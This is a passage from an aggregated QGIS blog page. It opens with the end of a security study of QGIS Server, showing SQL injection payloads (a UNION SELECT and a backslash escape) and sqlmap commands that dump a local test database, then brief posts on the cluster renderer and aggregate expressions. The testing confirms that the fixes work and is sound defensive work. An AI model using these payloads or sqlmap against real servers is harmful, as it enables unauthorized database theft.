SELECT * FROM point WHERE (("pkuid" > '1'')) UNION SELECT * FROM aoi --')
ERROR:  invalid input syntax for integer: "1')) union select * from aoi"

As regards the backslashes character with <ogc:Literal>\<ogc:Literal>:

SELECT * FROM point WHERE (("pkuid" > '1') OR ("pkuid" = E'\\'))

SQLMap: an automated injections SQL tool

So far, manual tests have allowed us to detect that without the safety check, the server is vulnerable to some classical injection SQL attacks. But we didn’t really exploit weak points until there.

Thus, we decided to run SQLMap, a penetration testing tool, with the safety check deactivated and for the whole bunch of attacks:

  • Boolean-based blind
  • Error-based
  • Union query-based
  • Stacked queries
  • Time-based blind
  • Inline queries

You know, just to see how far we can go! And it’s frankly impressive… Thanks to the exploitation of the weak points previously described, SQLMap is able to retrieve the content of the full database, whether it is PostgreSQL or SQLite!

$ python sqlmap.py -u "http://localhost/qgisserver?QUERY_LAYERS=point&LAYERS=point&SERVICE=WMS&WIDTH=500&HEIGHT=500&BBOX=606171,4822867,612834,4827375&CRS=EPSG:32613&MAP=/home/user/project.qgs&VERSION=1.1.1&REQUEST=GetFeatureInfo&FILTER=point:"name" = 'a')" -a -p FILTER --level=5 --dbms=postgresql --time-sec=1
......
......
$ ls ~/.sqlmap/output/localhost/dump/SQLite_masterdb/
aoi.csv                      idx_background_geometry_node.csv    sql_statements_log.csv
background.csv               idx_background_geometry_parent.csv  views_geometry_columns.csv
geometry_columns_auth.csv    idx_background_geometry_rowid.csv   views_layer_statistics.csv
geometry_columns.csv         layer_statistics.csv                virts_geometry_columns.csv
idx_aoi_geometry_node.csv    point.csv                           virts_layer_statistics.csv
idx_aoi_geometry_parent.csv  spatialite_history.csv
idx_aoi_geometry_rowid.csv   spatial_ref_sys.csv
$ cat ~/.sqlmap/output/localhost/dump/SQLite_masterdb/aoi.csv
pkuid,ftype
1,private_value

After this disturbing revelation, we retry to run SQLMap with the safety check function activated. And you know what!? He has not succeeded in infiltrating the server, whatever we tried!

$ python sqlmap.py -u "http://localhost/qgisserver?QUERY_LAYERS=point&LAYERS=point&SERVICE=WMS&WIDTH=500&HEIGHT=500&BBOX=606171,4822867,612834,4827375&CRS=EPSG:32613&MAP=/home/user/project.qgs&VERSION=1.1.1&REQUEST=GetFeatureInfo&FILTER=point:"name" = 'a')" -a -p FILTER --level=5 --dbms=postgresql --time-sec=1
[15:06:20] [INFO] testing connection to the target URL
[15:06:20] [WARNING] heuristic (basic) test shows that GET parameter 'FILTER' might not be injectable
[15:06:20] [INFO] testing for SQL injection on GET parameter 'FILTER'
[15:06:20] [WARNING] GET parameter 'FILTER' does not seem to be injectable
[15:06:20] [CRITICAL] all tested parameters appear to be not injectable.

Conclusion

The word of SQL injections is large and wide. As we noted throughout the previous study, many parameters have to be taken into account such as the kind of database actually used, extensions currently loaded, the importance of password robustness, …

Because of this, it’s always difficult (if not impossible) to say that a service is totally bulletproof against these kinds of attacks. However, thanks to this study and unit tests added in QGIS, we have the right to say that QGIS Server is very well protected against SQL injections because none of our attacks reach their goal!

Even more aggregations: QGIS point cluster renderer

In the previous post, I demonstrated the aggregation support in QGIS expressions. Another popular request is to aggregate or cluster point features that are close to each other. If you have been following the QGIS project on mailing list or social media, you probably remember the successful cluster renderer crowd-funding campaign by North Road.

The point cluster renderer is implemented and can be tested in the current developer version. The renderer is highly customizable, for example, by styling the cluster symbol and adjusting the distance between points that should be in the same cluster:

Beyond this basic use case, the point cluster renderer can also be combined with categorized visualizations and clusters symbols can be colored in the corresponding category color and scaled by cluster size, as demoed in this video by the developer Nyall Dawson:


Gereference a medal

Yesterday I ran the half marathon of Zwolle wearing a hat with the previous QGIS logo. My time was not so special (2:08:47) but the medal I earned was. It shows a simple map of the city of Zwolle. You can see some buildings but which ones? I decided to georerence the medal and add … Continue reading Gereference a medal

Aggregate all the things! (QGIS expression edition)

In the past, aggregating field values was reserved to databases, virtual layers, or dedicated plugins, but since QGIS 2.16, there is a way to compute aggregates directly in QGIS expressions. This means that we can compute sums, means, counts, minimum and maximum values and more!

Here’s a quick tutorial to get you started:

Load the airports from the QGIS sample dataset. We’ll use the elevation values in the ELEV field for the following examples:

QGIS sample airport dataset – categorized by USE attribute

The most straightforward expressions are those that only have one parameter: the name of the field that should be aggregated, for example:

mean(ELEV)

We can also add a second parameter: a group-by field, for example, to group by the airport usage type, we use:

mean(ELEV,USE)

To top it all off, we can add a third parameter: a filter expression, for example, to show only military airports, we use:

mean(ELEV,USE,USE='Military')

Last but not least, all this aggregating goodness also works across layers! For example, here is the Alaska layer labeled with the airport layer feature count:

aggregate('airports','count',"ID")

If you are using relations, you can even go one step further and calculate aggregates on feature relations.


  • <<
  • Page 2 of 36 ( 714 posts )
  • >>
  • qgis

Back to Top

Sponsors